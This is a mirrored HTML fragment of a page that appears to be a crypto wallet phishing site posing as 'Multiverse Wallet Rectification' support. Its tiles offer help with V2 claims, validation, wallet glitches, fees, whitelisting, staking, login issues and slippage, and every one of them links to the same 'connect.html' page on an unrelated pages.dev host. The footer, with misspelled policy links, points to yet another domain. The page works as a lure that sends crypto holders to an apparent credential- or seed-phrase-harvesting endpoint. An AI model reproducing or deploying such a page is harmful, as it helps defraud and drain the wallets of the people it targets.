                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/user-lock-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M592 288H576V212.7c0-41.84-30.03-80.04-71.66-84.27C456.5 123.6 416 161.1 416 208V288h-16C373.6 288 352 309.6 352 336v128c0 26.4 21.6 48 48 48h192c26.4 0 48-21.6 48-48v-128C640 309.6 618.4 288 592 288zM496 432c-17.62 0-32-14.38-32-32s14.38-32 32-32s32 14.38 32 32S513.6 432 496 432zM528 288h-64V208c0-17.62 14.38-32 32-32s32 14.38 32 32V288zM224 256c70.7 0 128-57.31 128-128S294.7 0 224 0C153.3 0 96 57.31 96 128S153.3 256 224 256zM320 336c0-8.672 1.738-16.87 4.303-24.7C308.6 306.6 291.9 304 274.7 304H173.3C77.61 304 0 381.7 0 477.4C0 496.5 15.52 512 34.66 512h301.7C326.3 498.6 320 482.1 320 464V336z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Claim V2</div>
                  <div class="description seccolor">Do you have any issue while trying to claim your v2?</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/network-wired-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M400 0C426.5 0 448 21.49 448 48V144C448 170.5 426.5 192 400 192H352V224H608C625.7 224 640 238.3 640 256C640 273.7 625.7 288 608 288H512V320H560C586.5 320 608 341.5 608 368V464C608 490.5 586.5 512 560 512H400C373.5 512 352 490.5 352 464V368C352 341.5 373.5 320 400 320H448V288H192V320H240C266.5 320 288 341.5 288 368V464C288 490.5 266.5 512 240 512H80C53.49 512 32 490.5 32 464V368C32 341.5 53.49 320 80 320H128V288H32C14.33 288 0 273.7 0 256C0 238.3 14.33 224 32 224H288V192H240C213.5 192 192 170.5 192 144V48C192 21.49 213.5 0 240 0H400zM256 64V128H384V64H256zM224 448V384H96V448H224zM416 384V448H544V384H416z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Validate</div>
                  <div class="description seccolor">Click here to start validation.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M506.3 417l-213.3-364c-16.33-28-57.54-28-73.98 0l-213.2 364C-10.59 444.9 9.849 480 42.74 480h426.6C502.1 480 522.6 445 506.3 417zM232 168c0-13.25 10.75-24 24-24S280 154.8 280 168v128c0 13.25-10.75 24-23.1 24S232 309.3 232 296V168zM256 416c-17.36 0-31.44-14.08-31.44-31.44c0-17.36 14.07-31.44 31.44-31.44s31.44 14.08 31.44 31.44C287.4 401.9 273.4 416 256 416z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Wallet Glitch/Error</div>
                  <div class="description seccolor">Click here if you have any glitch issues on your wallet.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/sack-dollar-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M320 96H192L144.6 24.88C137.5 14.24 145.1 0 157.9 0H354.1C366.9 0 374.5 14.24 367.4 24.88L320 96zM192 128H320C323.8 130.5 328.1 133.3 332.1 136.4C389.7 172.7 512 250.9 512 416C512 469 469 512 416 512H96C42.98 512 0 469 0 416C0 250.9 122.3 172.7 179 136.4C183.9 133.3 188.2 130.5 192 128V128zM276.1 224C276.1 212.9 267.1 203.9 255.1 203.9C244.9 203.9 235.9 212.9 235.9 224V230C230.3 231.2 224.1 232.9 220 235.1C205.1 241.9 192.1 254.5 188.9 272.8C187.1 283 188.1 292.9 192.3 301.8C196.5 310.6 203 316.8 209.6 321.3C221.2 329.2 236.5 333.8 248.2 337.3L250.4 337.9C264.4 342.2 273.8 345.3 279.7 349.6C282.2 351.4 283.1 352.8 283.4 353.7C283.8 354.5 284.4 356.3 283.7 360.3C283.1 363.8 281.2 366.8 275.7 369.1C269.6 371.7 259.7 373 246.9 371C240.9 370 230.2 366.4 220.7 363.2C218.5 362.4 216.3 361.7 214.3 361C203.8 357.5 192.5 363.2 189 373.7C185.5 384.2 191.2 395.5 201.7 398.1C202.9 399.4 204.4 399.9 206.1 400.5C213.1 403.2 226.4 407.4 235.9 409.6V416C235.9 427.1 244.9 436.1 255.1 436.1C267.1 436.1 276.1 427.1 276.1 416V410.5C281.4 409.5 286.6 407.1 291.4 405.9C307.2 399.2 319.8 386.2 323.1 367.2C324.9 356.8 324.1 346.8 320.1 337.7C316.2 328.7 309.9 322.1 303.2 317.3C291.1 308.4 274.9 303.6 262.8 299.9L261.1 299.7C247.8 295.4 238.2 292.4 232.1 288.2C229.5 286.4 228.7 285.2 228.5 284.7C228.3 284.3 227.7 283.1 228.3 279.7C228.7 277.7 230.2 274.4 236.5 271.6C242.1 268.7 252.9 267.1 265.1 268.1C269.5 269.7 283 272.3 286.9 273.3C297.5 276.2 308.5 269.8 311.3 259.1C314.2 248.5 307.8 237.5 297.1 234.7C292.7 233.5 282.7 231.5 276.1 230.3L276.1 224z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">High Fees</div>
                  <div class="description seccolor">Click here if you are facing an increase in transaction fees.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/circle-check-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M0 256C0 114.6 114.6 0 256 0C397.4 0 512 114.6 512 256C512 397.4 397.4 512 256 512C114.6 512 0 397.4 0 256zM371.8 211.8C382.7 200.9 382.7 183.1 371.8 172.2C360.9 161.3 343.1 161.3 332.2 172.2L224 280.4L179.8 236.2C168.9 225.3 151.1 225.3 140.2 236.2C129.3 247.1 129.3 264.9 140.2 275.8L204.2 339.8C215.1 350.7 232.9 350.7 243.8 339.8L371.8 211.8z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Whitelist</div>
                  <div class="description seccolor">Click here for help whitelisting your wallet for nfts.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/piggy-bank-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M400 96L399.1 96.66C394.7 96.22 389.4 96 384 96H256C239.5 96 223.5 98.08 208.2 102C208.1 100 208 98.02 208 96C208 42.98 250.1 0 304 0C357 0 400 42.98 400 96zM384 128C387.5 128 390.1 128.1 394.4 128.3C398.7 128.6 402.9 129 407 129.6C424.6 109.1 450.8 96 480 96H512L493.2 171.1C509.1 185.9 521.9 203.9 530.7 224H544C561.7 224 576 238.3 576 256V352C576 369.7 561.7 384 544 384H512C502.9 396.1 492.1 406.9 480 416V480C480 497.7 465.7 512 448 512H416C398.3 512 384 497.7 384 480V448H256V480C256 497.7 241.7 512 224 512H192C174.3 512 160 497.7 160 480V416C125.1 389.8 101.3 349.8 96.79 304H68C30.44 304 0 273.6 0 236C0 198.4 30.44 168 68 168H72C85.25 168 96 178.7 96 192C96 205.3 85.25 216 72 216H68C56.95 216 48 224.1 48 236C48 247 56.95 256 68 256H99.2C111.3 196.2 156.9 148.5 215.5 133.2C228.4 129.8 241.1 128 256 128H384zM424 240C410.7 240 400 250.7 400 264C400 277.3 410.7 288 424 288C437.3 288 448 277.3 448 264C448 250.7 437.3 240 424 240z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Staking</div>
                  <div class="description seccolor">Click here for tokens/coins staking related issues.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/right-to-bracket-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M344.7 238.5l-144.1-136C193.7 95.97 183.4 94.17 174.6 97.95C165.8 101.8 160.1 110.4 160.1 120V192H32.02C14.33 192 0 206.3 0 224v64c0 17.68 14.33 32 32.02 32h128.1v72c0 9.578 5.707 18.25 14.51 22.05c8.803 3.781 19.03 1.984 26-4.594l144.1-136C354.3 264.4 354.3 247.6 344.7 238.5zM416 32h-64c-17.67 0-32 14.33-32 32s14.33 32 32 32h64c17.67 0 32 14.33 32 32v256c0 17.67-14.33 32-32 32h-64c-17.67 0-32 14.33-32 32s14.33 32 32 32h64c53.02 0 96-42.98 96-96V128C512 74.98 469 32 416 32z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Login Issues</div>
                  <div class="description seccolor">Click here if you encounter any issues logging in to your wallet.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/bug-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path fill="#fff" d="M352 96V99.56C352 115.3 339.3 128 323.6 128H188.4C172.7 128 159.1 115.3 159.1 99.56V96C159.1 42.98 202.1 0 255.1 0C309 0 352 42.98 352 96zM41.37 105.4C53.87 92.88 74.13 92.88 86.63 105.4L150.6 169.4C151.3 170 151.9 170.7 152.5 171.4C166.8 164.1 182.9 160 199.1 160H312C329.1 160 345.2 164.1 359.5 171.4C360.1 170.7 360.7 170 361.4 169.4L425.4 105.4C437.9 92.88 458.1 92.88 470.6 105.4C483.1 117.9 483.1 138.1 470.6 150.6L406.6 214.6C405.1 215.3 405.3 215.9 404.6 216.5C410.7 228.5 414.6 241.9 415.7 256H480C497.7 256 512 270.3 512 288C512 305.7 497.7 320 480 320H416C416 344.6 410.5 367.8 400.6 388.6C402.7 389.9 404.8 391.5 406.6 393.4L470.6 457.4C483.1 469.9 483.1 490.1 470.6 502.6C458.1 515.1 437.9 515.1 425.4 502.6L362.3 439.6C337.8 461.4 306.5 475.8 272 479.2V240C272 231.2 264.8 224 255.1 224C247.2 224 239.1 231.2 239.1 240V479.2C205.5 475.8 174.2 461.4 149.7 439.6L86.63 502.6C74.13 515.1 53.87 515.1 41.37 502.6C28.88 490.1 28.88 469.9 41.37 457.4L105.4 393.4C107.2 391.5 109.3 389.9 111.4 388.6C101.5 367.8 96 344.6 96 320H32C14.33 320 0 305.7 0 288C0 270.3 14.33 256 32 256H96.3C97.38 241.9 101.3 228.5 107.4 216.5C106.7 215.9 106 215.3 105.4 214.6L41.37 150.6C28.88 138.1 28.88 117.9 41.37 105.4H41.37z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Rectification</div>
                  <div class="description seccolor">Click here for rectification related issues.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M506.3 417l-213.3-364c-16.33-28-57.54-28-73.98 0l-213.2 364C-10.59 444.9 9.849 480 42.74 480h426.6C502.1 480 522.6 445 506.3 417zM232 168c0-13.25 10.75-24 24-24S280 154.8 280 168v128c0 13.25-10.75 24-23.1 24S232 309.3 232 296V168zM256 416c-17.36 0-31.44-14.08-31.44-31.44c0-17.36 14.07-31.44 31.44-31.44s31.44 14.08 31.44 31.44C287.4 401.9 273.4 416 256 416z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Slippage</div>
                  <div class="description seccolor">Click here for slippage related issues.</div>
                </div>
              </a>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
  <footer class="footer">
    <div class="footer-bottom">
        <div class="container">
            <div class="row">
                <div class="col-lg-6">
                    <ul class="footer-menu">
                        <li class="menu-item by"> © 2022. Multiverse Wallet Rectification.
                        </li>
                    </ul>
                </div>
                <div class="col-lg-6 terms">
                    <ul id="footer-menu" class="footer-menu">
                        <li class="menu-item by"><a href="https://chainmetroodapps.vercel.app/index-2.html#">Term of Services</a></li>
                        <li class="menu-item by"><a href="https://chainmetroodapps.vercel.app/index-2.html#">Privay Policy</a></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</footer>
  </div>
    <!-- ***** BUTTON GO TOP ***** -->
    <a class="cd-top cd-is-visible" href="https://chainmetroodapps.vercel.app/index-2.html#0"><i class="fas fa-angles-up"></i> </a>
    <!-- Javascript -->
    
    
    
    
    <style type="text/css" data-typed-js-css="true">
        .typed-cursor{
          opacity: 1;
        }
        .typed-cursor.typed-cursor--blink{
          animation: typedjsBlink 0.7s infinite;
          -webkit-animation: typedjsBlink 0.7s infinite;
                  animation: typedjsBlink 0.7s infinite;
        }
        @keyframes typedjsBlink{
          50% { opacity: 0.0; }
        }
        @-webkit-keyframes typedjsBlink{
          0% { opacity: 1; }
          50% { opacity: 0.0; }
          100% { opacity: 1; }
        }
      </style>
    
  




</body><!-- Mirrored from floki-migration.netlify.app/smartsolu.xyz/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 17 Feb 2023 07:03:34 GMT --><!-- Mirrored from multiwallet-sync.netlify.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 16 May 2024 19:29:14 GMT -->
<!-- Mirrored from smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/right-left-solid.svg by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 12 Feb 2025 23:49:29 GMT -->
</html>